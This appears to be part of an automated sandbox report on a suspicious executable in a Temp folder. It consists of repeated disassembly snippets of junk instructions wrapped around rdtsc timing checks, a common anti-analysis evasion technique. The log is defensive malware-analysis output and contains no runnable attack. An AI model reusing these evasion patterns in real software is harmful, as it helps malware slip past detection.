Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6651BD second address: 6651D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FF698E1E1A6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007FF698E1E1A6h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 665353 second address: 665359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61D91C second address: 61D927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF698E1E1A6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61D927 second address: 61D996 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FF698BF10D8h 0x0000000f push 00000004h 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007FF698BF10C8h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b mov cx, di 0x0000002e mov edi, 4C47BFBBh 0x00000033 push eax 0x00000034 pushad 0x00000035 push edi 0x00000036 jp 00007FF698BF10C6h 0x0000003c pop edi 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007FF698BF10D1h 0x00000044 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 66584A second address: 665856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FF698E1E1A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 669838 second address: 669845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007FF698BF10C6h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 669845 second address: 669852 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FF698E1E1A6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 669852 second address: 669867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jp 00007FF698BF10CAh 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 66D7B0 second address: 66D7D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF698E1E1AAh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF698E1E1AFh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 66D7D0 second address: 66D7F0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FF698BF10D1h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 66D7F0 second address: 66D809 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 66D809 second address: 66D822 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 66CAFB second address: 66CB1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007FF698E1E1AAh 0x0000000b popad 0x0000000c jnc 00007FF698E1E1B2h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 66CB1E second address: 66CB29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FF698BF10C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 674909 second address: 67490D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 67490D second address: 67494C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF698BF10CDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e je 00007FF698BF10C6h 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 push edi 0x0000001a pushad 0x0000001b popad 0x0000001c pop edi 0x0000001d pushad 0x0000001e jmp 00007FF698BF10D1h 0x00000023 jbe 00007FF698BF10C6h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6754FD second address: 675503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 675DFB second address: 675E00 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 675E00 second address: 675E0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 675E0C second address: 675E10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 67608A second address: 676097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF698E1E1A6h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 676674 second address: 67667A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 67667A second address: 676685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 679BEF second address: 679BF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 67A253 second address: 67A257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 67A257 second address: 67A25B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 67A3D1 second address: 67A3D6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 67F290 second address: 67F2DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FF698BF10C6h 0x00000009 jmp 00007FF698BF10D3h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push esi 0x00000012 jmp 00007FF698BF10CEh 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 pop esi 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f jns 00007FF698BF10C6h 0x00000025 push edx 0x00000026 pop edx 0x00000027 jmp 00007FF698BF10D0h 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 67F2DF second address: 67F2FD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF698E1E1B6h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 68087F second address: 680883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 680883 second address: 6808F5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF698E1E1A6h 0x00000008 jp 00007FF698E1E1A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jno 00007FF698E1E1B2h 0x00000016 pushad 0x00000017 pushad 0x00000018 jns 00007FF698E1E1A6h 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 jmp 00007FF698E1E1B1h 0x00000025 jmp 00007FF698E1E1B0h 0x0000002a popad 0x0000002b pushad 0x0000002c push eax 0x0000002d pop eax 0x0000002e push esi 0x0000002f pop esi 0x00000030 jc 00007FF698E1E1A6h 0x00000036 jmp 00007FF698E1E1B0h 0x0000003b popad 0x0000003c push eax 0x0000003d push edx 0x0000003e jng 00007FF698E1E1A6h 0x00000044 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 68923E second address: 689242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 687886 second address: 68788B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 687E4E second address: 687E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 je 00007FF698BF10C6h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 687E5A second address: 687E6E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF698E1E1A6h 0x00000008 jl 00007FF698E1E1A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 687E6E second address: 687E7E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007FF698BF10C6h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 687E7E second address: 687E89 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 687E89 second address: 687E8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 688129 second address: 688149 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FF698E1E1A6h 0x00000010 jmp 00007FF698E1E1B0h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 686FD0 second address: 686FD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 68E7F7 second address: 68E7FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 68E7FB second address: 68E806 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 690B5A second address: 690B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 690B5E second address: 690B62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 690B62 second address: 690B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 690B6E second address: 690B76 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 692299 second address: 6922BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jng 00007FF698E1E1C1h 0x0000000d jmp 00007FF698E1E1B5h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 5CF118 second address: 5CF132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF698BF10C6h 0x0000000a pop ecx 0x0000000b jmp 00007FF698BF10CFh 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 5CF132 second address: 5CF138 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 5CF138 second address: 5CF13C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 5CF13C second address: 5CF150 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF698E1E1A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007FF698E1E1A6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 5CF150 second address: 5CF154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 5CF154 second address: 5CF158 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 695026 second address: 69503F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 ja 00007FF698BF10CEh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 69503F second address: 695045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 695045 second address: 695049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 695049 second address: 695065 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1B8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 695065 second address: 695070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 695070 second address: 695076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 695076 second address: 69507C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 695362 second address: 695383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FF698E1E1B7h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6A1941 second address: 6A1956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push edi 0x00000008 jc 00007FF698BF10C6h 0x0000000e pop edi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6A1956 second address: 6A195D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6A195D second address: 6A1971 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF698BF10CEh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6A1971 second address: 6A1975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6A8825 second address: 6A8829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6A8829 second address: 6A8838 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007FF698E1E1A6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6AD7A6 second address: 6AD7AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6AD7AB second address: 6AD7C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF698E1E1B4h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6B45B9 second address: 6B45C3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF698BF10C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6B45C3 second address: 6B45D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a js 00007FF698E1E1A8h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6B45D8 second address: 6B45DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6B8A60 second address: 6B8A8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jmp 00007FF698E1E1B0h 0x0000000d jmp 00007FF698E1E1B0h 0x00000012 popad 0x00000013 push esi 0x00000014 push esi 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6B8A8E second address: 6B8A93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6BC910 second address: 6BC921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jng 00007FF698E1E1ACh 0x0000000b jns 00007FF698E1E1A6h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6BC7AA second address: 6BC7AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6BC7AE second address: 6BC7C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF698E1E1B3h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6BC7C9 second address: 6BC7CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6C13E1 second address: 6C13EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 je 00007FF698E1E1A6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6C1880 second address: 6C188E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FF698BF10C6h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6C1A02 second address: 6C1A0C instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF698E1E1A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6C1A0C second address: 6C1A27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6C1BBC second address: 6C1BC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnp 00007FF698E1E1ACh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6C2621 second address: 6C262E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FF698BF10C6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6C4BF2 second address: 6C4C0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007FF698E1E1B2h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 5D266A second address: 5D266F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6C6BDE second address: 6C6BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6D6F3B second address: 6D6F41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
